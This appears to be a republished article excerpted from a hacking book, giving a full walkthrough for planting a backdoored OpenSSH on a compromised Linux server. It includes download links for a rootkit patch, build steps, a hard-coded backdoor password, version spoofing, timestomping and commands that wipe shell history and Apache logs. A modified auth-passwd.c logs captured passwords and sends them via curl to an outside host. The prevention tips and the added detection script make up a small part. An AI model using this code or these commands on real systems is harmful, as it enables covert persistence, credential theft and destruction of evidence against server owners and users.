The addition and Prevention of Linux OpenSSH back door

2025-03-31 Update. From: SLTechnology News&Howtos > Servers

Shulou (Shulou.com) 06/02 Report

Introduction: compared with Windows, passwords on a Linux operating system are harder to obtain. However, many Linux servers run the OpenSSH service. Once root permissions have been obtained, an intruder can intercept and save SSH login accounts and passwords by modifying or replacing the OpenSSH code, and can even leave an invisible backdoor to keep long-term control of the Linux server.

After breaking into a Linux system, many intruders leave a backdoor behind, and using OpenSSH for this is one of their usual methods. An OpenSSH backdoor is difficult to detect. This article is selected from "Hacker Attack and Defense: Practical Encryption and Decryption". We will discuss how an OpenSSH backdoor is added and how to prevent it.

1 Introduction to OpenSSH

OpenSSH is a free and open source implementation of the SSH (Secure Shell) protocol. Many people mistakenly think that OpenSSH is related to OpenSSL, but in fact the two projects have different purposes and different development teams; the names are similar only because they share the same goal of providing open source encrypted communication software.

OpenSSH is a sub-project of OpenBSD and its official website address is http://www.openssh.com/. Various versions of OpenSSH can be downloaded from its website.

The SSH protocol family can be used for remote control or for transferring files between computers. The traditional tools for this, such as Telnet (Terminal Emulation Protocol), RCP, FTP, Rlogin and RSH, are extremely insecure and transmit passwords in plaintext. OpenSSH provides a server-side daemon and client-side tools that encrypt the data during remote control and file transfer, replacing those older services. OpenSSH is an open source implementation of encrypted communication over a computer network using SSH, and it replaces the commercial version offered by SSH Communications Security. In the OpenSSH service, sshd is a typical stand-alone daemon, and the service is configured through the "/etc/ssh/sshd_config" file. OpenSSH supports versions 1.3, 1.5 and 2 of the SSH protocol; since OpenSSH 2.9, the default protocol has been version 2.

2 Preparation

01 Download openssh-5.9p1.tar.gz

openssh-5.9p1.tar.gz can be downloaded from http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz.

02 Download the backdoor file

The backdoor file download address is http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz.

03 Prepare the Linux virtual machine

Prepare a CentOS 6.4 Linux virtual machine.

04 View the current version of SSH

At present, the backdoor versions of SSH available on the Internet support versions below 5.9. As shown in the following figure, the OpenSSH version information obtained with the "ssh -V" command is "OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010".

The author has not tested SSH versions higher than 5.9, but because the banner value can be modified directly in the patch, this is feasible in theory.

Note: be sure to record the version number here so that this information can be disguised at compile time.

05 Back up the original SSH configuration files

As shown in the figure, back up ssh_config and sshd_config as ssh_config.old and sshd_config.old respectively. Execute the following backup commands in the Linux terminal.

mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

06 Decompress the SSH backdoor

Download sshbd.tgz locally and extract it by executing the following commands.

tar zxvf sshbd.tgz
cd openssh

If you install from the official package openssh-5.9p1, execute the following commands instead.

tar zxf openssh-5.9p1.tar.gz
tar zxf openssh-5.9p1.patch.tar.gz
cp openssh-5.9p1.patch/sshbd5.9p1.diff /openssh-5.9p1
cd openssh-5.9p1
patch < sshbd5.9p1.diff

3 Set the SSH backdoor login password and the password log location

Find the includes.h file in the OpenSSH directory and run "vi includes.h" to change "define _SECRET_PASSWD" to our login password, as shown in the figure.

By default the password logs are saved in the slog and clog files under the "/usr/local/share/0wn" directory. Assuming the password is "995430aaa", the code is as follows.

define _SECRET_PASSWD "995430aaa"

4 Install and compile the backdoor

01 Compile and install

Run the following commands.

./configure --prefix=/usr --sysconfdir=/etc/ssh
make && make install

openssh-5.9p1 needs to be configured with the following command.

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

During compilation the error "configure: error: *** zlib.h missing - please install first or check config.log" may appear. In that case, run "yum install zlib-devel" and "yum install openssl openssl-devel", then compile again.

02 Restart the SSHD service

Run "/etc/init.d/sshd restart" to restart the SSHD service.

03 Reset the timestamps of the new configuration files to those of the old files

Run the following commands so that the modification times of ssh_config and sshd_config match those of ssh_config.old and sshd_config.old.

touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config

mtime (modify time): the last time the contents of the file or directory were modified.
ctime (change time): the last time the file or directory was changed, meaning its metadata (attributes), for example the time its inode was modified. Apart from the "-d" and "-t" options, the touch command changes this time, and commands such as chmod and chown change it too.
atime (access time): the last time the file or directory was accessed.
ls -l file: view the file modification time.
ls -lc file: view the file status change time.
ls -lu file: view the file access time.
stat file: view all three time attributes of the file.

5 Log in through the backdoor and view the recorded password file

Log in to the server with "ssh -l root IP", for example "ssh -l root 192.168.52.175". Either root's own password or the password set in the backdoor, "995430aaa", can be used. Then go to the "/usr/local/share/0wn" directory and view the recorded password log files clog and slog; as the figure below shows, the passwords of SSH logins and of local root logins can be seen.

In actual testing, the Apache logs also need to be cleared. The following log-clearing commands are for reference.

export HISTFILE=/dev/null
export HISTSIZE=0
cd /etc/httpd/logs/
sed -i '/192.168.52.175/d' access_log*
echo > /root/.bash_history  // clear the operation log

6 Extending the password recording method

The passwords recorded so far can only be viewed on the Linux server itself: the user must have permission to read the file, and without the ability to log in to the server they cannot be reached. In this case, the best approach is to send the recorded user, password and port directly to a receiver by email or HTTP (similar to the mail used by the underground industry). The specific implementation is described below.

01 Receiver ssh.php code

02 Modify the contents of the auth-passwd.c file

int
userauth_passwd(Authctxt *authctxt)
{
    static int attempt = 0;
    char prompt[150];
    char *password;
    char *pass[200];
    char szres[1024] = {0};
    FILE *f;

    /* nested function (GCC extension): returns the "Port" line of sshd_config */
    char *findport()
    {
        FILE *FTopen;
        char tempBuf[1024] = {0};
        char *Filename = "/etc/ssh/sshd_config";
        char *Filetext = "Port";

        if ((FTopen = fopen(Filename, "r")) == NULL) {
            return Filetext;
        }
        while (fgets(tempBuf, 1024, FTopen) != NULL) {
            if (strstr(tempBuf, Filetext)) {
                Filetext = tempBuf;
                break;
            }
            memset(tempBuf, 0, 1024);
        }
        fclose(FTopen);
        return Filetext;
    }

    const char *host = options.host_key_alias ? options.host_key_alias : authctxt->host;

    if (attempt++ >= options.number_of_password_prompts)
        return 0;

    if (attempt != 1)
        error("Permission denied, please try again.");

    snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password:",
        authctxt->server_user, host);
    password = read_passphrase(prompt, 0);
    strcpy(pass, password);   /* copy it to a custom place when intercepting the password */
    packet_start(SSH2_MSG_USERAUTH_REQUEST);
    packet_put_cstring(authctxt->server_user);
    packet_put_cstring(authctxt->service);
    packet_put_cstring(authctxt->method->name);
    packet_put_char(0);
    packet_put_cstring(password);
    memset(password, 0, strlen(password));
    xfree(password);
    packet_add_padding(64);
    packet_send();
    dispatch_set(SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ, &input_userauth_passwd_changereq);

    if ((f = fopen("/tmp/olog", "a+")) != NULL) {
        fprintf(f, "username:%s-->password:%s-->host:%s-->port:%s\n",
            authctxt->server_user, pass, authctxt->host, findport());
        fclose(f);
    }
    memset(szres, 0, sizeof(szres));
    snprintf(szres, sizeof(szres),
        "/usr/bin/curl -s -d \"username=%s&password=%s&host=%s&port=%s\" http://www.antian365.com/ssh.php > /dev/null",
        authctxt->server_user, pass, authctxt->host, findport());
    system(szres);
    return 1;
}

Recompile, and after execution the password is automatically sent to the server. However, the author did not achieve this effect in actual testing. Please visit http://0cx.cc/ssh_get_password.jspx to check and verify the relevant information.

7 Precautions against the OpenSSH backdoor

The precautions against the OpenSSH backdoor are as follows.

Reinstall the OpenSSH software and update to the latest version, 7.2.
Change the SSH default login port 22 to a different port.
Add an SSH access policy to iptables.
Review the command history and clean up suspicious files.
Where conditions allow, reinstall the system.
Change the passwords of all users on the server to new strong passwords.

Run "ps aux | grep sshd" to get the PID of the suspicious process, then run "strace -o aa -ff -p PID" to trace it. After a successful SSH login, the strace output files are generated in the current directory. Use "grep open aa* | grep -v -e No -e null -e denied | grep WR" to look for the record file: the command filters out error messages, /dev/null messages and "denied" messages, leaving the files opened in read-write mode (WR), because the backdoor has to write the recorded password somewhere. The file opened for writing reveals the location of the SSH backdoor's password file, and this method can be used to determine whether an SSH backdoor is present. Of course, there are cases where passwords are not recorded at all and only a universal SSH backdoor password is left.
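The strace filter above and the mtime/ctime note in section 4 can be turned into a small check. This is an added example, not code from the book or the article; the strace lines are constructed, and the /usr/local/share/0wn and /tmp/olog paths are the ones the article names.

```python
import os
import re

# Constructed sample in the style of 'strace -o aa -ff -p PID' output (not a
# real capture); only the last two lines should be reported.
SAMPLE_STRACE = """\
open("/etc/ssh/sshd_config", O_RDONLY) = 4
open("/dev/null", O_RDWR) = 5
open("/var/log/btmp", O_WRONLY|O_APPEND) = -1 EACCES (Permission denied)
open("/usr/local/share/0wn/slog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 6
openat(AT_FDCWD, "/tmp/olog", O_WRONLY|O_CREAT|O_APPEND, 0666) = 7
"""

OPEN_RE = re.compile(r'open(?:at)?\((?:AT_FDCWD, )?"([^"]+)", ([A-Z_|]+)')

def write_opens(strace_text):
    """Paths the traced sshd opened for writing (O_WRONLY/O_RDWR) and that
    succeeded: the section 7 grep pipeline with /dev/null and errors dropped."""
    hits = []
    for line in strace_text.splitlines():
        m = OPEN_RE.search(line)
        if not m or " = -1 " in line:      # not an open(), or the open failed
            continue
        path, flags = m.groups()
        if path != "/dev/null" and ("O_WRONLY" in flags or "O_RDWR" in flags):
            hits.append(path)
    return hits

def timestomp_suspect(mtime, ctime, slack=300.0):
    """'touch -r' copies mtime from the .old file but the kernel sets ctime to
    'now', so a ctime well after mtime (epoch seconds) on a config file is a
    lead worth checking."""
    return ctime - mtime > slack

def check_config_times(paths=("/etc/ssh/sshd_config", "/etc/ssh/ssh_config")):
    """Apply the ctime/mtime check to real files; missing paths are skipped."""
    out = {}
    for p in paths:
        if os.path.exists(p):
            st = os.stat(p)
            out[p] = timestomp_suspect(st.st_mtime, st.st_ctime)
    return out

if __name__ == "__main__":
    print("write-mode opens:", write_opens(SAMPLE_STRACE))
    print("config files with ctime well after mtime:", check_config_times())
```

A later chmod or chown also moves ctime on its own, so treat a timestamp hit as a lead to confirm with a package integrity check such as rpm -V openssh-server on CentOS, which also covers the case where the backdoor records nothing.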

8 Summary

Get the Linux version and system information as follows.

cat /etc/issue
uname -ar

Get the information about the SSH version and record it, as follows.

ssh -V > ssh.txt

Download the OpenSSH client and backdoor program with the following command. There is also a version of sshd.tar.gz on the Internet.

wget http://down1.chinaunix.net/distfiles/openssh-5.9p1.tar.gz
wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

Back up the SSH configuration file with the following command.

mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

To install the prerequisite software, the command is as follows.

yum install -y openssl openssl-devel pam-devel zlib zlib-devel

Unpack the sources and apply the patch with the following commands.

tar zxf openssh-5.9p1.tar.gz
tar zxf openssh-5.9p1.patch.tar.gz
cp openssh-5.9p1.patch/sshbd5.9p1.diff /openssh-5.9p1
cd openssh-5.9p1
patch < sshbd5.9p1.diff

Change the location of the files that record usernames and passwords, and the backdoor password, in includes.h; the lines are as follows.

#define ILOG "/tmp/ilog"          //records usernames and passwords of logins to this machine
#define OLOG "/tmp/olog"          //records usernames and passwords used from this machine to log in to remote hosts
#define SECRETPW "123456654321"   //backdoor password

Change version.h so that the version information after modification matches the original version; the lines are as follows.

#define SSH_VERSION "fill in the version number recorded earlier, to disguise as the original version"
#define SSH_PORTABLE "minor version number"

Install and compile with the following commands.

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
make clean
make && make install
service sshd restart

Restore the dates of the new configuration files to match the old files. Compare the contents of ssh_config and sshd_config with the old files so that the configuration is consistent, then change the file dates.

touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config

Clear the operation log with the following commands.

export HISTFILE=/dev/null
export HISTSIZE=0
cd /etc/httpd/logs/
sed -i '/192.168.52.175/d' access_log*
echo > /root/.bash_history  // clear the operation log

This article is selected from "Hacker Attack and Defense: Practical Encryption and Decryption".
